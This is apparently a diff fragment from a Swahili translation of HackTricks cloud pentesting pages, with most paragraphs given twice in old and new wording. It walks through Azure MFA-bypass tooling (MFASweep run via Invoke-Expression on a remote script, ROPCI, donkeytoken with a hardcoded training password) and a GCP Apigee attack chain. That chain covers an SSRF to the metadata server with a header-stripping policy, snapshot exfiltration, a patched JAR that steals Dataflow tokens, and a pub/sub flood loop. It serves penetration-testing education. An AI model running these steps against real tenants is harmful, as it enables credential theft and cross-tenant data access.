MFASweep ni script ya PowerShell inayojaribu **kuingia kwenye huduma mbalimbali za Microsoft kwa kutumia seti ya akauti zilizotolewa na itajaribu kubaini kama MFA imewezeshwa**. Kulingana na jinsi sera za ufikiaji wa masharti na mipangilio mingine ya uthibitishaji wa hatua nyingi zilivyowekwa, baadhi ya itifaki zinaweza kuishia kuwa na hatua moja tu. Pia ina ukaguzi wa ziada kwa mipangilio ya ADFS na inaweza kujaribu kuingia kwenye seva ya ADFS ya ndani ikiwa itagundulika.
MFASweep ni PowerShell script ambayo inajaribu **kuingia kwenye huduma mbalimbali za Microsoft kwa kutumia seti ya credentials zilizotolewa na itajaribu kubaini ikiwa MFA imewezeshwa**. Kulingana na jinsi conditional access policies na mipangilio mingine ya multi-factor authentication imewekwa, baadhi ya protocols zinaweza kubaki kuwa single-factor. Pia ina ukaguzi wa ziada kwa konfigurisho za ADFS na inaweza kujaribu kuingia kwenye on-prem ADFS server ikiwa itagunduliwa.
```bash
Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1").Content
Invoke-MFASweep -Username <username> -Password <pass>
```
### [ROPCI](https://github.com/wunderwuzzi23/ropci)
Chombo hiki kimeisaidia kubaini njia za kupita MFA na kisha kutumia APIs katika AAD tenants nyingi za uzalishaji, ambapo wateja wa AAD walidhani walikuwa na MFA iliyotekelezwa, lakini uthibitishaji wa msingi wa ROPC ulifanikiwa.
Kifaa hiki kimewasaidia kutambua MFA bypasses na kisha kutumia APIs kwa uabusu katika multiple production AAD tenants, ambapo wateja wa AAD waliamini walikuwa na MFA iliyotekelezwa, lakini ROPC based authentication ilifanikiwa.
> [!TIP]
> Unahitaji kuwa na ruhusa za kuorodhesha programu zote ili uweze kuunda orodha ya programu za kushambulia kwa nguvu.
> Unahitaji kuwa na ruhusa za kuorodhesha applications zote ili uweze kuunda orodha ya apps za brute-force.
```bash
./ropci configure
./ropci apps list --all --format json -o apps.json
@@ -143,25 +143,25 @@ Chombo hiki kimeisaidia kubaini njia za kupita MFA na kisha kutumia APIs katika
```
### [donkeytoken](https://github.com/silverhack/donkeytoken)
Donkey token ni seti ya kazi ambazo zina lengo la kusaidia washauri wa usalama wanaohitaji kuthibitisha Sera za Ufikiaji wa Masharti, majaribio ya portali za Microsoft zilizo na 2FA, n.k.
Donkey token ni seti ya functions inayolenga kusaidia washauri wa usalama ambao wanahitaji kuthibitisha Conditional Access Policies, kufanya majaribio kwa 2FA-enabled Microsoft portals, n.k..
<pre class="language-powershell"><code class="lang-powershell"><strong>git clone https://github.com/silverhack/donkeytoken.git
</strong><strong>Import-Module '.\donkeytoken' -Force
</strong></code></pre>
**Jaribu kila portali** ikiwa inawezekana **kuingia bila MFA**:
**Jaribu kila portal** ikiwa inawezekana **login bila MFA**:
```bash
$username = "conditional-access-app-user@azure.training.hacktricks.xyz"
$username = "conditional-access-app-user@azure.hacktricks-training.com"
$password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
```
Kwa sababu **Azure** **portal** **haijakandamizwa**, inawezekana **kukusanya token kutoka kwa kiunganishi cha portal ili kufikia huduma yoyote iliyogunduliwa** na utekelezaji wa awali. Katika kesi hii, Sharepoint ilitambuliwa, na token ya kuifikia inahitajika:
Kwa sababu **Azure** **portal** haijawekewa vizingiti, inawezekana **kukusanya token kutoka kwenye endpoint ya portal ili kufikia huduma yoyote iliyogunduliwa** na utekelezaji uliopita. Katika kesi hii Sharepoint ilitambuliwa, na token ya kuifikia imeombwa:
```bash
$token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
Read-JWTtoken -token $token.access_token
```
Ikiwa token ina ruhusa Sites.Read.All (kutoka Sharepoint), hata kama huwezi kufikia Sharepoint kutoka mtandao kwa sababu ya MFA, inawezekana kutumia token hiyo kufikia faili kwa kutumia token iliyoundwa:
Ikiwa token ina ruhusa Sites.Read.All (kutoka Sharepoint), hata kama huwezi kufikia Sharepoint kupitia wavuti kwa sababu ya MFA, inawezekana kutumia token hiyo kufikia faili kwa kutumia token iliyotengenezwa:
```bash
$data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
```

68
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-apigee-post-exploitation.md Normal file
View File

@@ -0,0 +1,68 @@
# GCP - Apigee Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Apigee metadata SSRF -> Dataflow cross-tenant pivot
Mradi mmoja wa tenant wa Apigee unaweza kutumiwa vibaya kufikia Message Processor metadata server, kuiba service account yake, na kugeuka katika pipeline ya analytics ya Dataflow iliyoshirikiwa ambayo inasoma/inaandika buckets za cross-tenant.
### Fichua metadata server kupitia Apigee
- Weka target ya proxy ya Apigee kwa `http://169.254.169.254` na omba tokens kutoka `/computeMetadata/v1/instance/service-accounts/default/token` kwa `Metadata-Flavor: Google`.
- GCP metadata hukataa maombi yanayojumuisha `X-Forwarded-For`; Apigee huiongeza kiotomatiki. Ondoa kwa kutumia `AssignMessage` kabla ya kupitisha kupitia proxy:
```xml
<AssignMessage name="strip-xff">
<Remove>
<Headers>
<Header name="X-Forwarded-For"/>
</Headers>
</Remove>
<IgnoreUnresolvedVariables>true</IgnoreUnresolvedVariables>
</AssignMessage>
```
### Orodhesha akaunti ya huduma ya Apigee iliyoporwa
- The leaked SA (Google-managed under `gcp-sa-apigee`) inaweza kuorodheshwa kwa zana kama [gcpwn](https://github.com/NetSPI/gcpwn) ili kujaribu permissions kwa haraka.
- Permissions zenye nguvu zilizogunduliwa zilijumuisha **Compute disk/snapshot admin**, **GCS read/write across tenant buckets**, na **Pub/Sub topic publish**. Ugundaji wa msingi:
```bash
gcloud compute disks list --project <tenant-project>
```
### Snapshot exfiltration for opaque managed services
Kwa haki za disk/snapshot unaweza kuchunguza managed runtimes offline hata kama huwezi kuingia kwenye tenant project:
1. Tengeneza snapshot ya disk lengwa kwenye tenant project.
2. Nakili/hamisha snapshot kwenda project yako.
3. Tengeneza tena disk kutoka snapshot na uiweke kwenye VM yako.
4. Mount na chunguza logs/configs ili kupata majina ya internal buckets, service accounts, na options za pipeline.
### Dataflow dependency replacement via writable staging bucket
- Analytics workers zilivuta JARs kutoka GCS staging bucket wakati wa startup. Kwa sababu Apigee SA alikuwa na bucket write, pakua na patch JAR (mfano, kwa Recaf) ili kuita `http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token` na kuiba **Dataflow worker** token.
- Dataflow workers walikosa internet egress; exfiltrate kwa kuandika token kwenye GCS bucket inayodhibitiwa na attacker kwa kutumia in-cluster GCP APIs.
### Force malicious JAR execution by abusing autoscaling
Existing workers will not reload replaced artifacts. Flood the pipeline input to trigger new workers:
```bash
for i in {1..5000}; do
gcloud pubsub topics publish apigee-analytics-notifications \
--message "flood-$i" --project <tenant-project>
done
```
Instances mpya zilizotolewa hupakua JARs zilizorekebishwa na leak the Dataflow SA token.
### Mapungufu ya muundo wa Cross-tenant bucket
Msimbo wa Dataflow uliotengenezwa kwa decompilation ulionyesha njia za cache kama `revenue/edge/<api|mint>/tenant2TenantGroupCacheDir` chini ya shared metadata bucket, bila kipengele chochote maalum kwa tenant. Kwa Dataflow token unaweza kusoma/kuandika:
- `tenantToTenantGroup` caches zinazofichua majina ya project+environment ya tenants wengine.
- `customFields` and `datastores` folders zinazoshikilia analytics za kila ombi (including end-user IPs and plaintext access tokens) kwa tenants wote.
- Ufikiaji wa kuandika unaashiria uwezekano wa analytics tampering/poisoning.
## Marejeo
- [GatewayToHeaven: Finding a Cross-Tenant Vulnerability in GCP's Apigee](https://omeramiad.com/posts/gatewaytoheaven-gcp-cross-tenant-vulnerability/)
- [AssignMessage policy - header removal](https://cloud.google.com/apigee/docs/api-platform/reference/policies/assign-message-policy)
{{#include ../../../banners/hacktricks-training.md}}